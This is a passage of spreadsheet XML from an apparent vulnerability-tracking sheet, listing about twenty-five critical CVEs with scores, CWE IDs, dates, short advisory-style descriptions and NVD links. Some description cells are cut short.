      <c r="J191" s="5" t="inlineStr"/>
      <c r="K191" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L191" s="5" t="inlineStr">
        <is>
          <t>zuraCast versions up to and including 0.23.7 contain a SQL injection vulnerability in the backup restore functionality. The `azuracast:restore` command executes the `db.sql` file extracted from a backup archive without any content validation or sanitization. This allows a remote attacker to escalate privileges</t>
        </is>
      </c>
      <c r="M191" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67917</t>
        </is>
      </c>
    </row>
    <row r="192">
      <c r="A192" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B192" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67919</t>
        </is>
      </c>
      <c r="C192" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D192" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E192" s="5" t="inlineStr"/>
      <c r="F192" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G192" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H192" s="5" t="inlineStr"/>
      <c r="I192" s="5" t="inlineStr">
        <is>
          <t>2026-08-17</t>
        </is>
      </c>
      <c r="J192" s="5" t="inlineStr"/>
      <c r="K192" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L192" s="5" t="inlineStr">
        <is>
          <t>An issue in Halo 2.25.4 allows a remote attacker to execute arbitrary code via the PluginEndpoint.java, installFromUri method, and DefaultPluginApplicationContextFactory components</t>
        </is>
      </c>
      <c r="M192" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67919</t>
        </is>
      </c>
    </row>
    <row r="193">
      <c r="A193" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B193" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67967</t>
        </is>
      </c>
      <c r="C193" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D193" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E193" s="5" t="inlineStr"/>
      <c r="F193" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G193" s="5" t="inlineStr"/>
      <c r="H193" s="5" t="inlineStr"/>
      <c r="I193" s="5" t="inlineStr">
        <is>
          <t>2026-08-17</t>
        </is>
      </c>
      <c r="J193" s="5" t="inlineStr"/>
      <c r="K193" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L193" s="5" t="inlineStr">
        <is>
          <t>Buffer Overflow vulnerability in Tenda W20E V16.01.0.6(2782) allows an attacker to execute arbitrary code. This is an incomplete fix for CVE-2025-44867 and CVE-2026-36819</t>
        </is>
      </c>
      <c r="M193" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67967</t>
        </is>
      </c>
    </row>
    <row r="194">
      <c r="A194" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B194" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68004</t>
        </is>
      </c>
      <c r="C194" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D194" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E194" s="5" t="inlineStr"/>
      <c r="F194" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G194" s="5" t="inlineStr"/>
      <c r="H194" s="5" t="inlineStr"/>
      <c r="I194" s="5" t="inlineStr">
        <is>
          <t>2026-08-17</t>
        </is>
      </c>
      <c r="J194" s="5" t="inlineStr"/>
      <c r="K194" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="L194" s="5" t="inlineStr">
        <is>
          <t>An issue in OSSRS SRS (Simple Realtime Server) &lt;v5.0.213 allows a remote attacker to execute arbitrary code via RTMP publish authorization, vhost-level security configuration (security.enabled), SrsSecurity::check(), trunk/src/app/srs_app_security.cpp, and SRS RTMP listener components</t>
        </is>
      </c>
      <c r="M194" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68004</t>
        </is>
      </c>
    </row>
    <row r="195">
      <c r="A195" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B195" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68502</t>
        </is>
      </c>
      <c r="C195" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D195" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E195" s="5" t="inlineStr"/>
      <c r="F195" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G195" s="5" t="inlineStr"/>
      <c r="H195" s="5" t="inlineStr"/>
      <c r="I195" s="5" t="inlineStr">
        <is>
          <t>2026-07-30</t>
        </is>
      </c>
      <c r="J195" s="5" t="inlineStr"/>
      <c r="K195" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L195" s="5" t="inlineStr">
        <is>
          <t>LazyOwn RedTeam/APT Framework is an AI-powered C2 and red-team operations framework. Prior to 0.2.154, LazyOwn's lazyc2.py registers an unauthenticated Socket.IO input event handler that dispatches data.get('value') to LazyOwnShell.one_cmd, reaching LazyOwnShell.do_cmd and subprocess.call(command, shell=True), allowing unauthenticated remote code execution in the C2 process. This issue is fixed in 0.2.154.</t>
        </is>
      </c>
      <c r="M195" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68502</t>
        </is>
      </c>
    </row>
    <row r="196">
      <c r="A196" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B196" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68503</t>
        </is>
      </c>
      <c r="C196" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D196" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E196" s="5" t="inlineStr"/>
      <c r="F196" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G196" s="5" t="inlineStr"/>
      <c r="H196" s="5" t="inlineStr"/>
      <c r="I196" s="5" t="inlineStr">
        <is>
          <t>2026-07-30</t>
        </is>
      </c>
      <c r="J196" s="5" t="inlineStr"/>
      <c r="K196" s="5" t="inlineStr">
        <is>
          <t>CWE-1392</t>
        </is>
      </c>
      <c r="L196" s="5" t="inlineStr">
        <is>
          <t>LazyOwn RedTeam/APT Framework is an AI-powered C2 and red-team operations framework. Prior to 0.2.154, LazyOwn ships default C2 credentials LazyOwn and LazyOwn in payload.json and core/payload_schema.py and passes them unchanged to lazyc2.py HTTP Basic authentication, allowing any network-reachable attacker who knows the defaults to authenticate to the C2 dashboard with operator-level access. This issue is fixed in 0.2.154.</t>
        </is>
      </c>
      <c r="M196" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68503</t>
        </is>
      </c>
    </row>
    <row r="197">
      <c r="A197" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B197" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68839</t>
        </is>
      </c>
      <c r="C197" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D197" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E197" s="5" t="inlineStr"/>
      <c r="F197" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G197" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H197" s="5" t="inlineStr"/>
      <c r="I197" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J197" s="5" t="inlineStr"/>
      <c r="K197" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-20</t>
        </is>
      </c>
      <c r="L197" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows USB Mass Storage Class Driver allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M197" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68839</t>
        </is>
      </c>
    </row>
    <row r="198">
      <c r="A198" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B198" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69240</t>
        </is>
      </c>
      <c r="C198" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D198" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E198" s="5" t="inlineStr"/>
      <c r="F198" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G198" s="5" t="inlineStr">
        <is>
          <t>oracle, node.js</t>
        </is>
      </c>
      <c r="H198" s="5" t="inlineStr"/>
      <c r="I198" s="5" t="inlineStr">
        <is>
          <t>2026-08-03</t>
        </is>
      </c>
      <c r="J198" s="5" t="inlineStr"/>
      <c r="K198" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L198" s="5" t="inlineStr">
        <is>
          <t>Sequelize is a Node.js ORM tool. Prior to 6.37.4, SQL injection is possible with strings only if dialect is set to oracle. The escape function defined in sql-string.js does not escape quotes if the value starts with TO_TIMESTAMP or TO_DATE. In the Oracle dialect, when val is a string and starts with TO_TIMESTAMP or TO_DATE, escape returns val directly instead of replacing single quotes. An attacker can inject arbitrary SQL expressions through an application value that reaches this escape path. This issue is fixed in version 6.37.4.</t>
        </is>
      </c>
      <c r="M198" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69240</t>
        </is>
      </c>
    </row>
    <row r="199">
      <c r="A199" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B199" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69276</t>
        </is>
      </c>
      <c r="C199" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D199" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E199" s="5" t="inlineStr"/>
      <c r="F199" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G199" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H199" s="5" t="inlineStr"/>
      <c r="I199" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J199" s="5" t="inlineStr"/>
      <c r="K199" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-191</t>
        </is>
      </c>
      <c r="L199" s="5" t="inlineStr">
        <is>
          <t>Integer underflow (wrap or wraparound) in Microsoft UxTheme Library (uxtheme.dll) allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M199" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69276</t>
        </is>
      </c>
    </row>
    <row r="200">
      <c r="A200" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B200" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69408</t>
        </is>
      </c>
      <c r="C200" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D200" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E200" s="5" t="inlineStr"/>
      <c r="F200" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="G200" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H200" s="5" t="inlineStr"/>
      <c r="I200" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J200" s="5" t="inlineStr"/>
      <c r="K200" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-190</t>
        </is>
      </c>
      <c r="L200" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Microsoft Windows Media Foundation allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M200" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69408</t>
        </is>
      </c>
    </row>
    <row r="201">
      <c r="A201" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B201" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69431</t>
        </is>
      </c>
      <c r="C201" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D201" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E201" s="5" t="inlineStr"/>
      <c r="F201" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G201" s="5" t="inlineStr"/>
      <c r="H201" s="5" t="inlineStr"/>
      <c r="I201" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J201" s="5" t="inlineStr"/>
      <c r="K201" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L201" s="5" t="inlineStr">
        <is>
          <t>Heap-based</t>
        </is>
      </c>
      <c r="M201" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69431</t>
        </is>
      </c>
    </row>
    <row r="202">
      <c r="A202" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B202" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69463</t>
        </is>
      </c>
      <c r="C202" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D202" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E202" s="5" t="inlineStr"/>
      <c r="F202" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G202" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H202" s="5" t="inlineStr"/>
      <c r="I202" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J202" s="5" t="inlineStr"/>
      <c r="K202" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L202" s="5" t="inlineStr">
        <is>
          <t>Heap-based</t>
        </is>
      </c>
      <c r="M202" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69463</t>
        </is>
      </c>
    </row>
    <row r="203">
      <c r="A203" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B203" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69491</t>
        </is>
      </c>
      <c r="C203" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D203" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E203" s="5" t="inlineStr"/>
      <c r="F203" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G203" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H203" s="5" t="inlineStr"/>
      <c r="I203" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J203" s="5" t="inlineStr"/>
      <c r="K203" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L203" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Microsoft DirectMusic allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M203" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69491</t>
        </is>
      </c>
    </row>
    <row r="204">
      <c r="A204" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B204" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69493</t>
        </is>
      </c>
      <c r="C204" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D204" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E204" s="5" t="inlineStr"/>
      <c r="F204" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="G204" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H204" s="5" t="inlineStr"/>
      <c r="I204" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J204" s="5" t="inlineStr"/>
      <c r="K204" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-125</t>
        </is>
      </c>
      <c r="L204" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Event Logging Service allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M204" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69493</t>
        </is>
      </c>
    </row>
    <row r="205">
      <c r="A205" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B205" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69496</t>
        </is>
      </c>
      <c r="C205" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D205" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E205" s="5" t="inlineStr"/>
      <c r="F205" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="G205" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H205" s="5" t="inlineStr"/>
      <c r="I205" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J205" s="5" t="inlineStr"/>
      <c r="K205" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L205" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Compressed Folder allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M205" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69496</t>
        </is>
      </c>
    </row>
    <row r="206">
      <c r="A206" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B206" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69525</t>
        </is>
      </c>
      <c r="C206" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D206" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E206" s="5" t="inlineStr"/>
      <c r="F206" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="G206" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H206" s="5" t="inlineStr"/>
      <c r="I206" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J206" s="5" t="inlineStr"/>
      <c r="K206" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L206" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Remote Desktop Services allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M206" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69525</t>
        </is>
      </c>
    </row>
    <row r="207">
      <c r="A207" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B207" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69579</t>
        </is>
      </c>
      <c r="C207" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D207" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E207" s="5" t="inlineStr"/>
      <c r="F207" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="G207" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H207" s="5" t="inlineStr"/>
      <c r="I207" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J207" s="5" t="inlineStr"/>
      <c r="K207" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L207" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Message Queuing allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M207" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69579</t>
        </is>
      </c>
    </row>
    <row r="208">
      <c r="A208" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B208" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69586</t>
        </is>
      </c>
      <c r="C208" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D208" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E208" s="5" t="inlineStr"/>
      <c r="F208" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="G208" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H208" s="5" t="inlineStr"/>
      <c r="I208" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J208" s="5" t="inlineStr"/>
      <c r="K208" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-190</t>
        </is>
      </c>
      <c r="L208" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Microsoft Windows PDF allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M208" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69586</t>
        </is>
      </c>
    </row>
    <row r="209">
      <c r="A209" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B209" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69590</t>
        </is>
      </c>
      <c r="C209" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D209" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E209" s="5" t="inlineStr"/>
      <c r="F209" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="G209" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H209" s="5" t="inlineStr"/>
      <c r="I209" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J209" s="5" t="inlineStr"/>
      <c r="K209" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L209" s="5" t="inlineStr">
        <is>
          <t>Remote Code Execution in Windows Routing and Remote Access Service (RRAS) allows attacker to gain an unauthorized access to victim's machine</t>
        </is>
      </c>
      <c r="M209" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69590</t>
        </is>
      </c>
    </row>
    <row r="210">
      <c r="A210" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B210" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69595</t>
        </is>
      </c>
      <c r="C210" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D210" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E210" s="5" t="inlineStr"/>
      <c r="F210" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="G210" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H210" s="5" t="inlineStr"/>
      <c r="I210" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J210" s="5" t="inlineStr"/>
      <c r="K210" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L210" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Services for NFS ONCRPC XDR Driver allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M210" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69595</t>
        </is>
      </c>
    </row>
    <row r="211">
      <c r="A211" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B211" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69715</t>
        </is>
      </c>
      <c r="C211" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D211" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E211" s="5" t="inlineStr"/>
      <c r="F211" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="G211" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H211" s="5" t="inlineStr"/>
      <c r="I211" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J211" s="5" t="inlineStr"/>
      <c r="K211" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-125</t>
        </is>
      </c>
      <c r="L211" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Direct Show allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M211" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69715</t>
        </is>
      </c>
    </row>
    <row r="212">
      <c r="A212" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B212" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69730</t>
        </is>
      </c>
      <c r="C212" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D212" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E212" s="5" t="inlineStr"/>
      <c r="F212" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="G212" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H212" s="5" t="inlineStr"/>
      <c r="I212" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J212" s="5" t="inlineStr"/>
      <c r="K212" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L212" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows DNS allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M212" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69730</t>
        </is>
      </c>
    </row>
    <row r="213">
      <c r="A213" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B213" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69768</t>
        </is>
      </c>
      <c r="C213" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D213" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E213" s="5" t="inlineStr"/>
      <c r="F213" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G213" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H213" s="5" t="inlineStr"/>
      <c r="I213" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J213" s="5" t="inlineStr"/>
      <c r="K213" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L213" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows RNDIS allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M213" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69768</t>
        </is>
      </c>
    </row>
    <row r="214">
      <c r="A214" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B214" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69769</t>
        </is>
      </c>
      <c r="C214" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D214" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E214" s="5" t="inlineStr"/>
      <c r="F214" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G214" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H214" s="5" t="inlineStr"/>
      <c r="I214" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J214" s="5" t="inlineStr"/>
      <c r="K214" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L214" s="5" t="inlineStr">
        <is>
          <t>Heap-based</t>
        </is>
      </c>
      <c r="M214" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69769</t>
        </is>
      </c>
    </row>
    <row r="215">
      <c r="A215" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B215" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69819</t>
        </is>
      </c>
      <c r="C215" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D215" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E215" s="5" t="inlineStr"/>
      <c r="F215" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G215" s="5" t="inlineStr"/>
      <c r="H215" s="5" t="inlineStr"/>
      <c r="I215" s="5" t="inlineStr">
